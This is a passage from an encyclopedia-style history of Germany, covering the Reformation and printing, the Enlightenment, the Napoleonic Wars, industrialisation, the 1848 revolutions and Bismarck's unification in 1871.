The ProtestantReformationwas a triumph forliteracyand the newprinting press.[183][c][185][186]Luther's translation of the Bible into High German(theNew Testamentwas published in 1522; theOld Testamentwas published in parts and completed in 1534) was a decisive impulse for the increase of literacy inearly modern Germany,[181]and stimulated printing and distribution of religious books and pamphlets. From 1517 onward religious pamphlets flooded Germany and much of Europe. The Reformation instigated a media revolution as by 1530 over 10,000 individual works are published with a total of ten million copies. Luther strengthened his attacks on Rome by depicting a "good" against "bad" church. It soon became clear that print could be used for propaganda in the Reformation for particular agendas. Reform writers used pre-Reformation styles, clichés, and stereotypes and changed items as needed for their own purposes.[187]Especially effective were Luther'sSmall Catechism, for use of parents teaching their children, andLarger Catechism,for pastors.[188]Using the German vernacular they expressed the Apostles' Creed in simpler, more personal, Trinitarian language. Illustrations in the newly translated Bible and in many tracts popularized Luther's ideas.Lucas Cranach the Elder, the painter patronized by the electors of Wittenberg, was a close friend of Luther, and illustrated Luther's theology for a popular audience. He dramatized Luther's views on the relationship between the Old and New Testaments, while remaining mindful of Luther's careful distinctions about proper and improper uses of visual imagery.[189]
Luther's translation of the Bible into High Germanwas also decisive for theGerman languageand its evolution fromEarly New High Germanto Modern Standard German.[181]The publication of Luther's Bible was a decisive moment in the spread of literacy inearly modern Germany,[181]and promoted the development of non-local forms of language and exposed all speakers to forms of German from outside their own area.[190]
Notable late fifteenth to early eighteenth-centurypolymathsinclude:Johannes Trithemius, one of the founder of modern cryptography, founder ofsteganography, as well asbibliographyand literary studies as branches of knowledge;[191][192][193]Conrad Celtes, the first and foremost German cartographic writer and "the greatest lyric genius and certainly the greatest organizer and popularizer of German Humanism";[194][195][196][197]Athanasius Kircher, described by Fletcher as "a founder figure of various disciplines—of geology (certainly vulcanology), musicology (as a surveyor of musical forms), museum curatorship, Coptology, to name a few—and might be claimed today as the first theorist of gravity and a long-term originator of the moving pictures (with his magic lantern shows). Through his many enthusiasms, moreover, he was the conduit of others' pursuits in the rapidly widening horizon of knowledge that marks the later Renaissance.";[198]andGottfried Wilhelm Leibniz, one of the greatest, if not the greatest "Universal genius", of all times.[199][200]
Cartography developed strongly, with the center being Nuremberg, at the beginning of the sixteenth century.Martin WaldseemüllerandMatthias Ringmann'sUniversalis Cosmographiaand the 1513 edition ofGeographymarked the climax of a cartography revolution.[201][202]The emperor himself dabbled in cartography.[203]
In 1515,Johannes Stabius(court astronomer under Maximilian I),Albrecht Dürerand the astronomerKonrad Heinfogelproduced the first planispheres of both southern and northerns hemispheres, also the first printed celestial maps. These maps prompted the revival of interest in the field of uranometry throughout Europe.[204][205][206][207]
AstronomerJohannes KeplerfromWeil der Stadtwas one of the pioneering minds of empirical and rational research. Through rigorous application of the principles of theScientific methodhe construed hislaws of planetary motion. His ideas influenced contemporary Italian scientistGalileo Galileiand provided fundamental mechanical principles forIsaac Newton's theory ofuniversal gravitation.[208]
German Colonies in the Americas existed because theFree Imperial CitiesofAugsburgandNuremberggot colonial rights in theProvince of Venezuelaor North of South America in return for debts owed by theHoly Roman EmpireCharles V, who was also King of Spain. In 1528, Charles V issued a charter by which theWelser familypossessed the rights to explore, rule and colonize the area, also with the motivation of searching for the legendary golden city ofEl Dorado. Their principal colony wasKlein-Venedig. A never realized colonial project wasHanauish-Indiesintended byFriedrich Casimir, Count of Hanau-Lichtenbergas a fief of theDutch West India Company. The project failed due to a lack of funds and the outbreak of theFranco-Dutch Warin 1672.
Frederick William, ruler ofBrandenburg-Prussiasince 1640 and later called the GreatElector, acquiredEast Pomeraniavia thePeace of Westphaliain 1648. He reorganized his loose and scattered territories and managed to throw off the vassalage of Prussia under the Kingdom of Poland during theSecond Northern War.[212]In order to address the demographic problem of Prussia's largely rural population of about three million, he attracted the immigration and settlement of FrenchHuguenotsin urban areas. Many became craftsmen and entrepreneurs.[213]King Frederick William I, known as theSoldier King, who reigned from 1713 to 1740, established the structures for the highly centralized Prussian state and raised a professional army, that was to play a central role.[214]He also successfully operated a command economy that some historians consider mercantilist.[215][216]
The total population of Germany (in its1914 territorial extent) grew from 16 million in 1700 to 17 million in 1750 and reached 24 million in 1800. The 18th-century economy noticeably profited from widespread practical application of the Scientific method as greater yields and a more reliable agricultural production and the introduction of hygienic standards positively affected the birth rate – death rate balance.[217]
Louis XIVof France waged a series of successful wars in order to extend the French territory. He occupiedLorraine(1670) and annexed the remainder of Alsace (1678–1681) that included the free imperial city ofStraßburg. At the start of theNine Years' War, he also invaded theElectorate of the Palatinate(1688–1697).[218]Louis established a number ofcourtswhose sole function was to reinterpret historic decrees and treaties, theTreaties of Nijmegen(1678) and thePeace of Westphalia(1648) in particular in favor of his policies of conquest. He considered the conclusions of these courts, theChambres de réunionas sufficient justification for his boundless annexations. Louis' forces operated inside the Holy Roman Empire largely unopposed, because all available imperial contingents fought in Austria in theGreat Turkish War. TheGrand Allianceof 1689 took up arms against France and countered any further military advances of Louis. The conflict ended in 1697 as both parties agreed to peace talks after either side had realized, that a total victory was financially unattainable. TheTreaty of Ryswickprovided for the return of the Lorraine and Luxembourg to the empire and the abandoning of French claims to the Palatinate.[219]
After the last-minuterelief of Viennafrom a siege and the imminent seizure by aTurkish forcein 1683, the combined troops of theHoly League, that had been founded the following year, embarked on the military containment of theOttoman Empireand reconqueredHungaryin 1687.[220]ThePapal States, the Holy Roman Empire, thePolish–Lithuanian Commonwealth, theRepublic of Veniceand since 1686Russiahad joined the league under the leadership ofPope Innocent XI.Prince Eugene of Savoy, who served under emperor Leopold I, took supreme command in 1697 and decisively defeated the Ottomans in a series of spectacular battles and
manoeuvres. The 1699Treaty of Karlowitzmarked the end of the Great Turkish War and Prince Eugene continued his service for theHabsburg monarchyas president of theWar Council. He effectively ended Turkish rule over most of the territorial states in theBalkansduring theAustro-Turkish War of 1716–1718. TheTreaty of Passarowitzleft Austria to freely establish royal domains in Serbia and the Banat and maintain hegemony inSoutheast Europe, on which the futureAustrian Empirewas based.[221][222]
Frederick II "the Great"is best known for his military genius and unique utilisation of the highly organized army to make Prussia one of the great powers in Europe as well asescaping from almost certain national disasterat the last minute. He was also an artist, author and philosopher, who conceived and promoted the concept ofenlightened absolutism.[223][224]
Austrian empressMaria Theresasucceeded in bringing about a favorable conclusion for her inthe 1740 to 1748 warfor recognition of her succession to the throne. However,Silesiawas permanently lost to Prussia as a consequence of theSilesian Warsand theSeven Years' War. The 1763Treaty of Hubertusburgruled that Austria and Saxony had to relinquish all claims to Silesia. Prussia, that had nearly doubled its territory was eventually recognized as a great European power with the consequence that the politics of the following century were fundamentally influenced byGerman dualism, the rivalry of Austria and Prussia for supremacy in Central Europe.[225]
The concept of enlightened absolutism, although rejected by the nobility and citizenry, was advocated inPrussiaandAustriaand implemented since 1763. Prussian kingFrederick IIdefended the idea in an essay and argued that thebenevolent monarchsimply is thefirst servant of the state, who effects his absolute political power for the benefit of the population as a whole. A number of legal reforms (e.g. the abolition of torture and the emancipation of the rural population and the Jews), the reorganization of thePrussian Academy of Sciences, the introduction of compulsory education for boys and girls and promotion of religious tolerance, among others, caused rapid social and economic development.[226]
During 1772 to 1795 Prussia instigated thepartitions of Polandby occupying the western territories of the formerPolish–Lithuanian Commonwealth. Austria andRussiaresolved to acquire the remaining lands with the effect that Poland ceased to exist as a sovereign state until 1918.[227]
The smaller German states were overshadowed by Prussia and Austria.Bavariahad arural economy.Saxonywas in economically good shape, although numerous wars had taken their toll. During the time when Prussia rose rapidly within Germany, Saxony was distracted by foreign affairs. The House of Wettin concentrated on acquiring and then holding on to the Polish throne which was ultimately unsuccessful.[228][clarification needed]
Many of the smaller states of Germany were run by bishops, who in reality were from powerful noble families and showed scant interest in religion. While none of the later ecclesial rulers reached the outstanding reputation of Mainz'Johann Philipp von Schönbornor Münster'sChristoph Bernhard von Galen, some of them promotedEnlightenmentlike the benevolent and progressiveFranz Ludwig von ErthalinWürzburgandBamberg.[229]
InHesse-Kassel, the LandgraveFrederick II, ruled from 1760 to 1785 as an enlightened despot, and raised money by renting soldiers (called "Hessians") toGreat Britainto help fight theAmerican Revolutionary War. He combined Enlightenment ideas with Christian values,cameralistplans for central control of the economy, and a militaristic approach toward diplomacy.[230]
Hanoverdid not have to support a lavish court—its rulers were also kings of England and resided in London.George III, elector (ruler) from 1760 to 1820, never once visited Hanover. The local nobility who ran the country opened theUniversity of Göttingenin 1737; it soon became a world-class intellectual center.Badensported perhaps the best government of the smaller states.Karl Friedrichruled for 73 years and was an enthusiast for the Enlightenment; he abolished serfdom in 1783.[231]
The smaller states failed to form coalitions with each other, and were eventually overwhelmed by Prussia who swallowed up many of them between 1807 and 1871.[232]
Prussiaunderwent majorsocial changebetween the mid-17th and mid-18th centuries as thenobilitydeclined as the traditionalaristocracystruggled to compete with the risingmerchant class,[233]which developed into a newBourgeoisiemiddle class,[234][235][236]while theemancipation of the serfsgranted the ruralpeasantryland purchasing rights and freedom of movement,[237]and a series ofagrarian reformsin northwestern Germany abolishedfeudal obligationsand divided up feudal land, giving rise to wealthier peasants and paved the way for a more efficientrural economy.[238]
During the mid-18th century, the recognition and application of Enlightenment cultural, intellectual and spiritual ideals and standards, led to a flourishing of art, music, philosophy, science and literature. The philosopherChristian Wolffwas a pioneering author in a vast number of fields of Enlightenment rationality, and established German as the prevailing language of philosophical reasoning, scholarly instruction and research.[239]
In 1685, MargraveFrederick Williamof Prussia issued theEdict of Potsdamwithin a week after French kingLouis XIV'sEdict of Fontainebleau, that decreed the abolishment of the 1598concessionto free religious practice forProtestants. Frederick William offered hisco-religionists, who are oppressed and assailed for the sake of the Holy Gospel and its pure doctrine...a secure and free refuge in all Our Lands.[240]Around 20,000 Huguenot refugees arrived in an immediate wave and settled in the cities, 40% in Berlin, the ducal residence alone. The French Lyceum in Berlin was established in 1689 and the French language had by the end of the 17th century replaced Latin to be spoken universally in international diplomacy. The nobility and the educated middle-class of Prussia and the various German states increasingly used the French language in public conversation in combination with universal cultivated manners. Like no other German state, Prussia had access to and the skill set for the application of pan-European Enlightenment ideas to develop more rational political and administrative institutions.[241]The princes of Saxony carried out a comprehensive series of fundamental fiscal, administrative, judicial, educational, cultural and general economic reforms. The reforms were aided by the country's strong urban structure and influential commercial groups, who modernized pre-1789 Saxony along the lines of classic Enlightenment principles.[242]
Johann Gottfried von Herderbroke new ground in philosophy and poetry, as a leader of theSturm und Drangmovement of proto-Romanticism.Weimar Classicism("Weimarer Klassik") was a cultural and literary movement based in Weimar that sought to establish a new humanism by synthesizing Romantic, classical, and Enlightenment ideas. The movement, from 1772 until 1805, involved Herder as well as polymathJohann Wolfgang von GoetheandFriedrich Schiller, a poet and historian. Herder argued that every folk had its own particular identity, which was expressed in its language and culture. This legitimized the promotion of German language and culture and helped shape the development of German nationalism. Schiller's plays expressed the restless spirit of his generation, depicting the hero's struggle against social pressures and the force of destiny.[243]
German music, sponsored by the upper classes, came of age under composersJohann Sebastian Bach,Joseph Haydn, andWolfgang Amadeus Mozart.[244]
KönigsbergphilosopherImmanuel Kanttried to reconcile rationalism and religious belief, individual freedom, and political authority. Kant's work contained basic tensions that would continue to shape German thought – and indeed all of European philosophy – well into the 20th century.[245][246]The ideas of the Enlightenment and their implementation received general approval and recognition as principal cause for widespread cultural progress.[247]
German reaction to theFrench Revolutionwas mixed at first. German intellectuals celebrated the outbreak, hoping to see the triumph of Reason and The Enlightenment. The royal courts in Vienna and Berlin denounced the overthrow of the king and the threatened spread of notions of liberty, equality, and fraternity. By 1793, theexecution of the French kingand the onset ofthe Terrordisillusioned the Bildungsbürgertum (educated middle classes). Reformers said the solution was to have faith in the ability of Germans to reform their laws and institutions in peaceful fashion.[248]
Europe was racked by two decades of war revolving around France's efforts to spread its revolutionary ideals, and the opposition of reactionary royalty. War broke out in 1792 as Austria and Prussia invaded France, but were defeated at theBattle of Valmy(1792). The German lands saw armies marching back and forth, bringing devastation (albeit on a far lower scale than theThirty Years' War, almost two centuries before), but also bringing new ideas of liberty and civil rights for the people. Prussia and Austria ended their failed wars with France but (with Russia) partitioned Poland among themselves in 1793 and 1795.
Francetook control of theRhineland, imposed French-style reforms, abolished feudalism, established constitutions, promoted freedom of religion, emancipated Jews, opened the bureaucracy to ordinary citizens of talent, and forced the nobility to share power with the rising middle class. Napoleon created theKingdom of Westphaliaas a model state.[249]These reforms proved largely permanent and modernized the western parts of Germany. When the French tried to impose the French language, German opposition grew in intensity. ASecond Coalitionof Britain, Russia, and Austria then attacked France but failed. Napoleon established direct or indirect control over most of western Europe, including the German states apart from Prussia and Austria. The old Holy Roman Empire was little more than a farce; Napoleon simply abolished it in 1806 while forming new countries under his control. In Germany Napoleon set up the "Confederation of the Rhine", comprising most of the German states except Prussia and Austria.[250]
UnderFrederick William II's weak rule (1786–1797) Prussia had undergone a serious economic, political and military decline. His successor kingFrederick William IIItried to remain neutral during theWar of the Third CoalitionandFrench emperorNapoleon's dissolution of theHoly Roman Empireand reorganisation of the German principalities. Induced by the queen and a pro-war party Frederick William joined theFourth Coalitionin October 1806. Napoleon easily defeated the Prussian army at theBattle of Jenaand occupied Berlin. Prussia lost its recently acquired territories in western Germany, its army was reduced to 42,000 men, no trade with Britain was allowed and Berlin had to pay Paris high reparations and fund the French army of occupation.Saxonychanged sides to support Napoleon and joined theConfederation of the Rhine. RulerFrederick Augustus Iwas rewarded with the title of king and given a part of Poland taken from Prussia, which became known as theDuchy of Warsaw.[251]
AfterNapoleon's military fiasco in Russia in 1812, Prussia allied with Russia in theSixth Coalition. A series of battles followed and Austria joined the alliance. Napoleon was decisively defeated in theBattle of Leipzigin late 1813. The German states of the Confederation of the Rhine defected to the Coalition against Napoleon, who rejected any peace terms. Coalition forces invaded France in early 1814,Paris felland in April Napoleon surrendered. Prussia as one of the winners at theCongress of Vienna, gained extensive territory.[217]
In 1815, continental Europe was in a state of overall turbulence and exhaustion, as a consequence of theFrench RevolutionaryandNapoleonic Wars. The liberal spirit of theEnlightenmentand Revolutionary era diverged towardRomanticism.[252]The victorious members of the Coalition had negotiated a new peaceful balance of powers in Vienna and agreed to maintain a stable German heartland that keeps French imperialism at bay. However, the idea of reforming the defunctHoly Roman Empirewas discarded. Napoleon'sreorganization of the German stateswas continued and the remaining princes were allowed to keep their titles. In 1813, in return for guarantees from the Allies that the sovereignty and integrity of the Southern German states (Baden,Württemberg, andBavaria) would be preserved, they broke with France.[253]
During the 1815Congress of Viennathe 39 former states of theConfederation of the Rhinejoined theGerman Confederation, a loose agreement for mutual defense. Attempts at economic integration and customs coordination were frustrated by repressive anti-national policies. Great Britain approved of the union, convinced that a stable, peaceful entity in central Europe could discourage aggressive moves by France or Russia. Most historians, however, concluded, that the Confederation was weak and ineffective and an obstacle to German nationalism. The union was undermined by the creation of theZollvereinin 1834, the1848 revolutions, the rivalry between Prussia and Austria and was finally dissolved in the wake of theAustro-Prussian Warof 1866,[254]to be replaced by theNorth German Confederationduring the same year.[254]
Increasingly after 1815, a centralized Prussian government based in Berlin took over the powers of the nobles, which in terms of control over the peasantry had been almost absolute. To help the nobility avoid indebtedness, Berlin set up a credit institution to provide capital loans in 1809, and extended the loan network to peasants in 1849. When the German Empire was established in 1871, the Junker nobility controlled the army and the navy, the bureaucracy, and the royal court; they generally set governmental policies.[255]
Between 1815 and 1865 the population of the German Confederation (excluding Austria) grew around 60% from 21 million to 34 million.[256]Simultaneously theDemographic Transitiontook place as the high birth rates and high death rates of the pre-industrial country shifted to low birth and death rates of the fast-growing industrialized urban economic and agricultural system. Increased agricultural productivity secured a steady food supply, as famines and epidemics declined. This allowed people to marry earlier, and have more children. The high birthrate was offset by a very high rate of infant mortality and after 1840, large-scale emigration to the United States. Emigration totaled at 480,000 in the 1840s, 1,200,000 in the 1850s, and at 780,000 in the 1860s. The upper and middle classes first practiced birth control, soon to be universally adopted.[257]
In 1800, Germany's social structure was poorly suited to entrepreneurship or economic development. Domination by France during the French Revolution (1790s to 1815), however, produced important institutional reforms, that included the abolition of feudal restrictions on the sale of large landed estates, the reduction of the power of the guilds in the cities, and the introduction of a new, more efficient commercial law. The idea that these reforms were beneficial for Industrialization is a subject of debate among historians.[258]
In the early 19th century the Industrial Revolution was in full swing in Britain, France, and Belgium. The various small federal states in Germany developed only slowly and autonomously as competition was strong. Early investments for the railway network during the 1830s came almost exclusively from private hands. Without a central regulatory agency, construction projects were quickly realized. Actual industrialization only took off after 1850 in the wake of the railroad construction.[259]The textile industry grew rapidly, profiting from the elimination of tariff barriers by the Zollverein.[260][261]During the second half of the 19th century German industry grew exponentially and by 1900, Germany was an industrial world leader along with Britain and the United States.[262]
In 1800, the population was predominantly rural, as only 10% lived in communities of 5,000 or more people, and only 2% lived in cities of more than 100,000 people. After 1815, the urban population grew rapidly, due to the influx of young people from the rural areas. Berlin grew from 172,000 in 1800, to 826,000 inhabitants in 1870, Hamburg from 130,000 to 290,000, Munich from 40,000 to 269,000 and Dresden from 60,000 to 177,000.[263]
The initial stage of economic development came with the railroad revolution in the 1840s, which opened up new markets for local products, created a pool of middle managers, increased the demand for engineers, architects and skilled machinists and stimulated investments in coal and iron. Political disunity among three dozen states and a pervasive conservatism made it difficult to build railways in the 1830s. However, by the 1840s, trunk lines did link the major cities; each German state was responsible for the lines within its own borders. EconomistFriedrich Listsummed up the advantages to be derived from the development of the railway system in 1841:
Lacking a technological base at first, engineering and hardware was imported from Britain. In many cities, the new railway shops were the centres of technological awareness and training, so that by 1850, Germany was self-sufficient in meeting the demands of railroad construction, and the railways were a major impetus for the growth of the new steel industry. Observers found that even as late as 1890, their engineering was inferior to Britain. However, German unification in 1870 stimulated consolidation, nationalisation into state-owned companies, and further rapid growth. Unlike the situation in France, the goal was the support of industrialisation. Eventually numerous lines criss-crossed the Ruhr area and other industrial centers and provided good connections to the major ports of Hamburg and Bremen. By 1880, 9,400 locomotives pulled 43,000 passengers and 30,000 tons of freight a day.[259]
While there existed no national newspaper the many states issued a great variety of printed media, although they rarely exceeded regional significance. In a typical town existed one or two outlets, urban centers, such as Berlin and Leipzig had dozens. The audience was limited to a few per cent of male adults, chiefly from the aristocratic and upper middle class. Liberal publishers outnumbered conservative ones by a wide margin. Foreign governments bribed editors to guarantee a favorable image.[265]Censorship was strict, and the imperial government issued the political news that was supposed to be published. After 1871, strict press laws were enforced by Bismarck to contain the Socialists and hostile editors. Editors focused on political commentary, culture, the arts, high culture and the popular serialized novels. Magazines were politically more influential and attracted intellectual authors.[266]
19th-century artists and intellectuals were greatly inspired by the ideas of the French Revolution and the great poets and writersJohann Wolfgang von Goethe,Gotthold Ephraim LessingandFriedrich Schiller. TheSturm und Drangromanticmovement was embraced and emotion was given free expression in reaction to the perceived rationalism of theEnlightenment. Philosophical principles and methods were revolutionized byImmanuel Kant's paradigm shift.Ludwig van Beethovenwas the most influential composer of the period fromclassicaltoRomantic music. His use of tonal architecture in such a way as to allow significant expansion of musical forms and structures was immediately recognized as bringing a new dimension to music. His later piano music and string quartets, especially, showed the way to a completely unexplored musical universe, and influencedFranz SchubertandRobert Schumann. In opera, a new Romantic atmosphere combining supernatural terror and melodramatic plot in a folkloric context was first successfully achieved byCarl Maria von Weberand perfected byRichard Wagnerin hisRing Cycle. TheBrothers Grimmcollected folk stories into the popularGrimm's Fairy Talesand are ranked among the founding fathers ofGerman studiesinasmuch as they initiated the work on theDeutsches Wörterbuch("The German Dictionary"), the most comprehensive work on the German language.[267]
University professors developed international reputations, especially in subjects from the humanities such as history and philology, which brought a new historical perspective to the study of political history, theology, philosophy, language, and literature. WithGeorg Wilhelm Friedrich Hegel,Friedrich Wilhelm Joseph Schelling,Arthur Schopenhauer,Friedrich Nietzsche,Max Weber,Karl MarxandFriedrich Engelsin philosophy,Friedrich Schleiermacherin theology andLeopold von Rankein history, German scholars became famous. TheUniversity of Berlin, founded in 1810, became the world's leading university. Von Ranke, for example, professionalized history and set the world standard for historiography. By the 1830s mathematics, physics, chemistry, and biology had emerged with world class science, led byAlexander von Humboldtin natural science andCarl Friedrich Gaussin mathematics. Young intellectuals often turned to politics, but their support for the failed revolution of 1848 forced many into exile.[217]
Two main developments reshaped religion in Germany. Across the land, there was a movement to unite the larger Lutheran and the smaller Reformed Protestant churches. The churches themselves brought this about in Baden, Nassau, and Bavaria. However, in Prussia KingFrederick William IIIwas determined to handle unification entirely on his own terms, without consultation. His goal was to unify the Protestant churches, and to impose a single standardized liturgy, organization, and even architecture. The long-term goal was to have fully centralized royal control of all the Protestant churches. In a series of proclamations over several decades theChurch of the Prussian Unionwas formed, bringing together the more numerous Lutherans, and the less numerous Reformed Protestants. The government of Prussia now had full control over church affairs, with the king himself recognized as the leading bishop. Opposition to unification came from the "Old Lutherans" in Silesia who clung tightly to the theological and liturgical forms they had followed since the days of Luther. The government attempted to crack down on them, so they went underground. Tens of thousands migrated,to South Australia, and especially to the United States, where they formed theMissouri Synod, which is still in operation as a conservative denomination. Finally in 1845 a new kingFrederick William IVoffered a general amnesty and allowed the Old Lutherans to form a separate church association with only nominal government control.[268][269][270]
From the religious point of view of the typical Catholic or Protestant, major changes were underway in terms of a much more personalized religiosity that focused on the individual more than the church or the ceremony. The rationalism of the late 19th century faded away, and there was a new emphasis on the psychology and feeling of the individual, especially in terms of contemplating sinfulness, redemption, and the mysteries and the revelations of Christianity.Pietistic revivalswere common among Protestants. Among, Catholics there was a sharp increase in popular pilgrimages. In 1844 alone, half a million pilgrims made a pilgrimage to the city of Trier in the Rhineland to view theSeamless robe of Jesus, said to be the robe that Jesus wore on the way to his crucifixion. Catholic bishops in Germany had historically been largely independent of Rome, but now the Vatican exerted increasing control, a new "ultramontanism" of Catholics highly loyal to Rome.[271]A heated controversy erupted in 1837–1838 in the largely Catholic Rhineland over the religious education of children of mixed marriages, where the mother was Catholic and the father Protestant. The government passed laws to require that these children always be raised as Protestants, contrary to Napoleonic law that had previously prevailed and allowed the parents to make the decision. The government put the Catholic Archbishop under house arrest. In 1840, the new King Frederick William IV sought reconciliation and defused the controversy by agreeing to most of the Catholic demands. However Catholic memories remained deep and led to a sense that Catholics always needed to stick together in the face of a hostile government.[272]
After the fall of Napoleon, Europe's statesmen convened in Vienna in 1815 for the reorganisation of European affairs, under the leadership of theAustrian Prince Metternich. The political principles agreed upon at thisCongress of Viennaincluded the restoration, legitimacy and solidarity of rulers for the repression of revolutionary and nationalist ideas.
TheGerman Confederation(German:Deutscher Bund) was founded, a loose union of 39 states (35 ruling princes and 4 free cities) under Austrian leadership, with a Federal Diet (German:Bundestag) meeting inFrankfurt am Main. It was a loose coalition that failed to satisfy most nationalists. The member states largely went their own way, and Austria had its own interests.
In 1819, a student radical assassinated the reactionary playwrightAugust von Kotzebue, who had scoffed at liberal student organisations. In one of the few major actions of the German Confederation, Prince Metternich called a conference that issued the repressiveCarlsbad Decrees, designed to suppress liberal agitation against the conservative governments of the German states.[273]The Decrees terminated the fast-fading nationalist fraternities (German:Burschenschaften), removed liberal university professors, and expanded the censorship of the press. The decrees began the "persecution of the demagogues", which was directed against individuals who were accused of spreading revolutionary and nationalist ideas. Among the persecuted were the poetErnst Moritz Arndt, the publisher Johann Joseph Görres and the "Father of Gymnastics" Ludwig Jahn.[274]
In 1834, theZollvereinwas established, a customs union between Prussia and most other German states, but excluding Austria. As industrialisation developed, the need for a unified German state with a uniform currency, legal system, and government became more and more obvious.
Growing discontent with the political and social order imposed by the Congress of Vienna led to the outbreak, in 1848, of theMarch Revolutionin the German states. In May the German National Assembly (theFrankfurt Parliament) met in Frankfurt to draw up a national German constitution.
But the 1848 revolution turned out to be unsuccessful:King Frederick William IV of Prussiarefused the imperial crown, the Frankfurt parliament was dissolved, the ruling princes repressed the risings by military force, and the German Confederation was re-established by 1850. Many leaders went into exile, including a number who went to the United States and became a political force there.[275]
The 1850s were a period of extreme political reaction. Dissent was vigorously suppressed, and many Germans emigrated to America following the collapse of the 1848 uprisings. Frederick William IV became extremely depressed and melancholic during this period, and was surrounded by men who advocatedclericalismandabsolute divine monarchy. The Prussian people once again lost interest in politics. Prussia not only expanded its territory but began to industrialize rapidly, while maintaining a strong agricultural base.
In 1857, the Prussian kingFrederick William IVsuffered a stroke and his brotherWilliamserved as regent until 1861 when he became King William I. Although conservative, William was very pragmatic. His most significant accomplishment was the naming ofOtto von Bismarckas Prussian minister president in 1862. The cooperation of Bismarck, Defense MinisterAlbrecht von Roon, and Field MarshalHelmut von Moltkeset the stage for the military victories over Denmark, Austria, and France that led to the unification of Germany.[276][277]
In 1863–1864, disputes between Prussia and Denmark overSchleswig, which was not part of the German Confederation, and which Danish nationalists wanted to incorporate into the Danish kingdom escalated. The conflict led to theSecond War of Schleswigin 1864. Prussia, joined by Austria, easily defeated Denmark and occupiedJutland. The Danes were forced to cede both the Duchy of Schleswig and theDuchy of Holsteinto Austria and Prussia. The subsequent management of the two duchies led to tensions between Austria and Prussia. Austria wanted the duchies to become an independent entity within the German Confederation, while Prussia intended to annex Austria. The disagreement served as a pretext for theSeven Weeks Warbetween Austria and Prussia that broke out in June 1866. In July, the two armies clashed at Sadowa-Königgrätz (Bohemia) in anenormous battleinvolving half a million men. Prussian superior logistics and the then-modern breech-loadingneedle guns'superiority over the slowmuzzle-loading riflesof the Austrians proved to be essential for Prussia's victory. The battle had also decided thestruggle for hegemonyin Germany and Bismarck was deliberately lenient with a defeated Austria that would play only a subpordinate role in future German affairs.[278][279]
After theSeven Weeks War, the German Confederation was dissolved and theNorth German Federation(GermanNorddeutscher Bund) was established under the leadership of Prussia. Austria was excluded and its immense influence over Germany finally came to an end. The North German Federation was a transitional organisation that existed from 1867 to 1871, between the dissolution of the German Confederation and the founding of the German Empire.[280]
ChancellorOtto von Bismarckdetermined the political course of the German Empire until 1890. He fostered alliances in Europe to contain France on the one hand and aspired to consolidate Germany's influence in Europe on the other. His principal domestic policies focused on the suppression of socialism and the reduction of the strong influence of the Roman Catholic Church on its adherents. He issued a series of anti-socialist laws in accord with a set of social laws, that included universal health care, pension plans and other social security programs. HisKulturkampfpolicies were vehemently resisted by Catholics, who organized political opposition in the Center Party (Zentrum). German industrial and economic power had grown to match Britain by 1900.
In 1888, the young and ambitious KaiserWilhelm IIbecame emperor. He rejected advice from experienced politicians and ordered Bismarck's resignation in 1890. He opposed Bismarck's carefully considered foreign policy and was determined to pursue colonialist policies, as Britain and France had been doing for centuries. The Kaiser promoted the active colonization of Africa and Asia for the lands that were not already colonies of other European powers. The Kaiser took a mostly unilateral approach in Europe only allied with the Austro-Hungarian Empire, and embarked on a dangerous naval arms race with Britain. His aggressive and ill-considered policies greatly contributed to the situation in which the assassination of the Austrian-Hungarian crown prince would sparkWorld War I.
Bismarck was the dominant personality not just in Germany but in all of Europe and indeed the entire diplomatic world 1870–1890. Historians continue to debate his goals.Lothar GallandErnst Engelbergconsider Bismarck was a future-oriented modernizer. In sharp contrast,Jonathan Steinbergdecided he was basically a traditional Prussian whose highest priorities were to reinforce the monarchy, the Army, and the social and economic dominance of his own Junker class, thereby being responsible for a tragic history after his removal in 1890.[281]
In 1868, the Spanish queenIsabella IIwas deposed in theGlorious Revolution, leaving the country's throne vacant. When Prussia suggested the Hohenzollern candidate,Prince Leopoldas successor, France vehemently objected. The matter evolved into adiplomatic scandaland in July 1870, France resolved to end it in afull-scale war. The conflict was quickly decided as Prussia, joined by forces of a pan-German alliance never gave up the tactical initiative. A series of victories in north-eastern France followed and another French army group was simultaneously encircled at Metz. A few weeks later, the French army contingent under EmperorNapoleon III's personal command was finally forced to capitulate in thefortress of Sedan.[282][283]Napoleon was taken prisoner and aprovisional governmenthastily proclaimed in Paris. The new government resolved to fight on and tried to reorganize the remaining armies while the Germans settled down to besiege Paris. The starving city surrendered in January 1871 and Jules Favre signed the surrender at Versailles. France was forced to pay indemnities of 5 billion francs and cedeAlsace-Lorraineto Germany. This conclusion left the French national psyche deeply humiliated and further aggravated theFrench–German enmity.
During theSiege of Paris, the German princes assembled in theHall of Mirrorsof thePalace of Versailleson 18 January 1871 and announced the establishment of theGerman Empireand proclaimed the Prussian KingWilhelm IasGerman Emperor. The actunified all ethnic German stateswith the exception of Austria in theLittle German solutionof a federal economic, political and administrative unit. Bismarck, was appointed to serve as Chancellor.
The new empire was afederalunion of 25 states that varied considerably in size, demography, constitution, economy, culture, religion and socio-political development. However, even Prussia itself, which accounted for two-thirds of the territory as well as of the population, had emerged from the empire's periphery as a newcomer. It also faced colossal cultural and economic internal divisions. The Prussian provinces of Westphalia and the Rhineland for example had been under French controlduring the previous decades. The local people, who had benefited from the liberal, civil reforms, that were derived from the ideas of the French Revolution, had only little in common with predominantly rural communities in authoritarian and disjointedJunkerestates ofPommerania.[284]The inhabitants of the smaller territorial lands, especially in central and southern Germany greatly rejected the Prussianized concept of the nation and preferred to associate such terms with their individual home state. The Hanseatic port cities of Hamburg, Bremen and Lübeck ranked among the most ferocious opponents of theso-called contract with Prussia. As advocates of free trade, they objected to Prussian ideas of economic integration and refused to sign the renewedZollverein(Custom Union) treaties until 1888.[285]TheHanseaticmerchants' overseas economic success corresponded with their globalist mindset. The citizen of Hamburg, whom Bismark characterized asextremely irritatingand the German ambassador in London asthe worst Germans we have, were particularly appalled by Prussian militarism and its unopposed growing influence.[286][unreliable source?]
The Prusso-German authorities were aware of necessary integration concepts as the results and the 52%voter turnoutof thefirst imperial electionshad clearly demonstrated. Historians increasingly argue, that the nation-state wasforged through empire.[287]National identity was expressed in bombastic imperialstone iconographyand was to be achieved as an imperial people, withan emperor as head of state and it was to develop imperial ambitions– domestic, European and global.[288][287]
